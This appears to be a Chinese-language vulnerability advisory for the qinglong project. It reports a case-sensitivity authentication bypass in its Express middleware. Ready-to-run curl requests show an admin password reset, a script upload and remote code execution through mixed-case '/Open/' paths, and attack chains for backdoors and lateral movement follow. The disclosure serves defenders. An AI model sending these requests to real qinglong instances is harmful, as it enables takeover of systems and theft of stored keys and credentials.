在青龙（qinglong）项目中发现了一个严重的鉴权绕过漏洞，攻击者可以在无需任何令牌的情况下：

1. 绕过所有鉴权检查
2. 重置管理员密码
3. 上传任意文件
4. 执行任意代码（RCE）
5. 完全控制系统

漏洞详情

漏洞类型

• 鉴权绕过 (CWE-285)
• 远程代码执行 (CWE-94)
• 权限提升 (CWE-250)

风险等级

• 严重程度: 极高 (Critical)
• CVSS评分: 9.8/10
• 可利用性: 极易
• 影响范围: 完整系统控制

漏洞位置

• 文件: /back/loaders/express.ts
• 行号: 第54行
• 函数: 鉴权中间件

根本原因

问题代码

// /back/loaders/express.ts:54
if (!['/open/', '/api/'].some((x) => req.path.startsWith(x))) {
  return next();
}

关键缺陷

1. 大小写敏感漏洞: req.path.startsWith('/open/') 只匹配小写，但Express路由不区分大小写
2. 重写规则不一致: app.use(rewrite('/open/*', '/api/$1')) 的pattern匹配与鉴权检查不同步
3. 路径解析差异: Express在不同阶段对路径处理存在不一致

漏洞验证

实际测试结果

1. 管理员密码重置绕过

# 无需token的密码重置 - 成功！
curl -X PUT -H "Content-Type: application/json" \
  -d '{"password":"pwned123","username":"admin"}' \
  "http://localhost:5700/Open/system/auth/reset"

# 响应: {"code":200,"message":"更新成功"}

2. 任意文件上传绕过

# 上传恶意脚本 - 成功！
curl -X POST -H "Content-Type: application/json" \
  -d '{"filename":"rce.sh","content":"#!/bin/bash\nwhoami > /tmp/pwned.txt"}' \
  "http://localhost:5700/Open/scripts" 

# 响应: {"code":200}

3. 远程代码执行

# 执行恶意代码 - 成功！
curl -X PUT -H "Content-Type: application/json" \
  -d '{"filename":"rce.js","content":"console.log(\"RCE SUCCESS!\")"}' \
  "http://localhost:5700/Open/scripts/run"

# 响应: {"code":200,"data":24844}  <- 返回进程PID

绕过路径列表

• /Open/ (首字母大写)
• /OPEN/ (全大写)
• /oPeN/ (混合大小写)
• /OpEn/ (其他组合)

攻击场景

攻击链1: 完全系统接管

1. 密码重置 → 获得管理员权限
2. 文件上传 → 部署后门
3. 代码执行 → 完全控制系统

攻击链2: 内网渗透

1. 信息收集 → 获取系统信息
2. 权限维持 → 植入持久化后门
3. 横向移动 → 攻击内网其他系统

影响评估

直接影响

• 系统完全沦陷: 攻击者获得root级别权限
• 数据完全暴露: 所有任务、配置、密钥泄露
• 服务完全中断: 系统可被恶意控制或破坏

业务影响

• 任务管理系统被控制: 攻击者可修改、删除关键定时任务
• 敏感信息泄露: 环境变量、API密钥、数据库凭证
• 内网成为跳板: 青龙通常部署在内网，成为横向攻击入口